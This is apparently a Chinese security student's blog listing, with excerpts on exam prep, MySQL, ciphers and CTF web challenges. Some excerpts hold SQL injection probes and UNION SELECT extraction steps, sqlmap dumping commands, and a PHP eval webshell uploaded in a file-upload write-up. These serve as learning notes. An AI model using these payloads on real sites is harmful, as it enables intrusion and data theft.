- 博客(26)
- 收藏
- 关注
RSS订阅原创 研究生拟录取分享
一战复盘二战加油 考研经历一战复盘(2021)(数一/英一/政治/数据结构)一战失败,分不高,情绪低落,回顾自己一战学习经历,虽经历疫情在家效率不高,但也认真学习,但结果还是狠狠给了我一击,看到分数少的可怜,唉😔,在二战与工作中挣扎了许久,决定还是重新学习,重新翻开书本,努力奋斗。🌻英语 😓总结教训,不把英语当回事,没有踏实去学单词,语法没学透彻,长难句底子弱,阅读没有精读,作文不背,总想着考场临时发挥,却不知自己根本没有临场发挥的能力,最后只能自食恶果!!🔥千万不要觉得英语拉不开分,4
2022-06-23 19:24:40
102
原创 SQL注入小记
SQL注入笔记:寻找注入点:访问下面的连接来观察页面的返回信息:(1)http://xxx.com/jyh.php?id=9(2)http://xxx.com/jyh.php?id=9’ and ‘1’='1(3)http://xxx.com/jyh.php?id=9 and ‘1’='2产生的情况可能有如下几种:**页面没有变化:**访问三个链接,显示的页面没有什么不同。这种情况说...
2019-12-19 10:53:29
200
原创 netcat小试
内容(1)Netcat建立通信通道、监控和文件传输(2)Cryptcat建立加密通信隧道(3)*Rootkit文件隐藏及检测 (加分实验)原理netcat:netCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end) 工具,能被其它的程序或脚本直接地或容易地驱动。同时,它又是一个功能丰富...
2019-12-19 08:16:56
371
原创 ubuntu18.04 安装 gmp
gmp 是一个大型的算术运算库在ubuntu上安装gmp,在gmp-devel官网上下载https://gmplib.org/下载之后解压:tar -xjvf gmp-6.1.2.tar.bz2检查是否成功:出现的都是pass,则成功;安装该目录下安装gmp-devel可以在该目录下看到我们安装的库;...
2019-04-19 20:55:36
11069
7
转载 cookie和session详解
在网上发现一博客讲解非常详细,可以点击下面链接进行查看,希望对cookie和session有一个更详细的了解https://www.cnblogs.com/linguoguo/p/5106618.html
2018-08-24 17:09:24
167
原创 i 春秋 web 题 <include>
打开链接地址:http://454e308408314446b0961f6226b502e7ad8cd9afd5614658.game.ichunqiu.com/题题目中以给出提示,这是文件包含题,打开题目链接后出现:代码中包含一个phpinfo.php文件,试着去打开这个文件,什么也没有发现。而且可以发现改代码是没有防护的文件包含。既然是关于php的,可以使用php协议在该链接下...
2018-08-22 19:30:11
1981
原创 传统知识+古典密码
拿到这道题,发现咋出现了一串关于年份的东西,这又是什么密码,由于上次做题出现一串汉字于是出来个当铺密码,所以这次看到还以为像上次一样出现一个没听说过的密码名称,于是放进百度,搜一下,没出现什么密码名称,于是想起它的顺序表 将题目中的内容一一对应,得出一数字字符:28 30 23 8 17 10 16 30,但题目中还提到 “信的背面还写有“+甲子”,”,然后各加六十(一甲子代表60年...
2018-08-11 19:59:48
2025
原创 i春秋 upload
打开题目链接:可以随意上传文件, 上传图片,txt文件,php文件等都能上传上去;试着上传一句话;当上传一句话木马时,上传成功后,原文件变成了如下:把<?和php过滤掉了,再上传另一个一句话; <script language="PHP"> @eval($_POST["code"]);</script>上传后连接菜刀; ...
2018-08-11 13:23:44
1774
原创 MYSQL数据库学习(四)
引擎:引擎就好像是汽车的发动机,但在数据库中的引擎没有好坏之分,只有适合不适合。数据库的存储引擎分为:BLACKHOLE,CSV,MEMORY,ARCHIVE,MYISAM,InnoDB;但其中最常用的是MYISAM和InnoDB;其它对现在都不常用;MYISAM:1.支持全文索引(full text)2.不支持事务3.表级锁(通俗来说就是将表封锁起来,一个一个进)...
2018-08-10 09:12:27
277
原创 疑惑的汉字
王夫 井工 夫口 由中人 井中 夫夫 由中大 从题目中看到这一串字符,一串中文,啥?这是啥?我们平时看到的密码都是英文或符号,那这个,,,做题在于积累,从查阅得这是一个当铺密码。什么是当铺密码?当铺密码就是一种将中文和数字进行转换的密码,算法:当前汉字有多少笔画出头,就转化为数字几; 王夫 井工 夫口 由中人 井中 夫夫 由中大 对应:67 84 7...
2018-08-09 20:00:12
1454
原创 mysql数据库学习(三)
DQL 数据查询语言select 列名1,列名2,.......from 表名 (while 条件); 查询指定列的内容;查询所有字段用 * 不带where 条件 把表的所有记录查出来;过滤掉重复的列值:select distinct 列名1 from 表名;select concat(列名1,列名2) from 表名; 将列名(列内容)链接起来;sele...
2018-08-08 09:08:08
358
5
原创 mysql数据库学习(二)
DML 数据操作语言查询表的内容 select * from 表名 在表中插入内容 insert into 表名(列名1,列名2,········) values (列值 1,列值2,······); 也可以选择插入,想要在哪个列名中插入信息就选择哪个列名,插入哪个列值; 也可以直接用values,省略其中的列名插入,不过在直接用values插入时,必须列顺序插入,否则会出错;...
2018-08-06 14:35:02
511
原创 貌似有点难
打开链接发现上面出现了,你的ip不在允许列表之内,那该怎么办,打开代码:<?phpfunction GetIP(){if(!empty($_SERVER["HTTP_CLIENT_IP"])) $cip = $_SERVER["HTTP_CLIENT_IP"];else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) $...
2018-08-05 15:33:16
105
原创 TCP与UDP的区别
TCP:传输控制协议 三次握手: { 1.A—->B 询问:[我可以发送数据吗?] 2.B—->A 回答:[可以你发吧] 3.A—->B 确认:[我已收到回复,开始传输实际数据] }TCP建立连接要进行3次握手,而断开连接要进行4次1 当主机A完成数据传输后,将控制位FIN置1,提出停止TCP连接的请求 2 主机B收到F...
2018-08-05 10:47:46
131
原创 mysql数据库学习(一)
数据库(database)数据表(table)字段(column)(字段类型(数据类型)) 列 column 行 row SQL 结构查询语言 查询规则: 1.以分号结束; 2.关键字不区分大小写(推荐大写); 3.三种注释:#,–,/* */; mysql支持的数据类型: 数据类型分类: 1.数值类型 一般常用int型数据; 2.浮点类型 ...
2018-08-04 21:17:49
13257
1
原创 安装mysql数据库5.6版本
安装mysql两种安装方式,有mysql安装包安装方式和mysql压缩包安装方式,安装包比较简单,一步步下一步就可以,不过其中需要也有需要注意的点;接下来着重说一下在windows下mysql压缩包安装方式。1.下载mysql压缩包;最好在官网上下载,上一篇文章提到mysql的下载; 2.解压;下载后会得到一个压缩包, 将压缩包解压到你创建的文件夹中,如,我的是mysql文件夹,以我的为...
2018-08-02 20:49:29
1809
原创 web学习大概要点1
web{前端 htmlweb应用 wordpress开发框架 struts2 spring脚本语言 java asp php中间件 apache nginx IIS数据库 MSSql mysql操作系统 Linux/Windows}HTTP协议了解URL计算机共有65535个端口GET/POST/PUT/HEADburpsuit用法数...
2018-08-02 19:32:56
211
原创 SQLMap的使用
SQLMap最早是在命令行下运行的工具,SQLmap提供了丰富的命令参数,使用起来极其灵活。SQLmap的命令一般都是通用的,只有极少数命令是针对个别数据库的。已知存在注入点http://www.xxser.com/user.jsp?id=1,使用SQLmap对其提取管理员数据具体步骤如下:1. 判断是否存在注入点: sqlmap.py -u “http://www.xxser.com...
2018-07-18 15:05:21
213
原创 安装MYSQL
打开网址 httpgs://dev.mysql.com 最好官网上下载,进去以后点击downloads,里面会出现企业版和community —-> 点击community,(最好不要点击企业版,因为企业版大部分是收费的) —-> 点击mysql community server —> 里面有各种版本,有 5.5 5.6 5.7 8.0 的版本,8.0是开发...
2018-07-16 20:43:58
199
2
原创 看起来有点简单
打开链接,会看到这样一个页面只有一个简单的网格,没有其他东西,查看源代码,也没有发现什么有用的东西,于是就试一下在网址处进行注入。在网址后面加一个单引号出错,加一句 and 1=1 正常,加 and 1=2 出错。则存在注入...
2018-07-16 15:39:57
143
原创 困在栅栏里的凯撒
看到题目时,并没有什么解题链接,只出现一串 NlEyQd{seft} 这样的字符,那我们就要开始去分析这串字符,从题目中找出答案,困在栅栏中的凯撒,则一开始就想到栅栏解密,栅栏解密后再用凯撒解密得出答案,由于凯撒密码解后,有26种可能,需要从中找出可能的答案;下面就详细去了解下什么是栅栏密码,如何去加密,解密。栅栏密码所谓栅栏密码,就是把要加密的明文分成N个一组,然后把每组的第1个字连起来,形成...
2018-07-15 10:35:08
1401
原创 SQL注入题1
service mysql start;mysql -u root -q;use mysql;show databases;id=1 order by 3 判断列数id =-1 union select 1,2,3 判断出现位数id=-1 union select 1,use(),database() 查询数据库名id=-1 union select 1,(select table_name fr...
2018-07-06 21:30:30
747
原创 抓包分析工具
如wireshark/TCPdumpwirshark:MAC地址过滤ip.addr/src/dst eq/(==) ip地址 过滤所有/源/目的地址的数据包http过滤http.resquest.method =="GET"/"POST" 获取用GTE/POST请求的数据包端口过滤tcp.port == 80 tcp协议中的80端口udp.port == 80 udp协议中的80...
2018-07-05 20:05:47
274
原创 猫抓老鼠详解
该题主要用到的工具是burpSuite; 从题目中catch,catch,catch,中看出主要是抓包,打开链接,输入123,的结果为 然后看一下源代码 并没有发现什么,这时候想一下抓包;设置代理,用burpSuit抓包,可以看到 光从抓包信息中并没有发现什么答案,我们可以试着分析下http请求消息和响应消息从响应消息中可以看出大部分消息头很常见,但Content-Row:却很少见,试想一下密码会...
2018-07-04 20:12:27
803
空空如也
研究生方向 关于数据安全方向的
2023-05-10
TA创建的收藏夹 TA关注的收藏夹
TA关注的人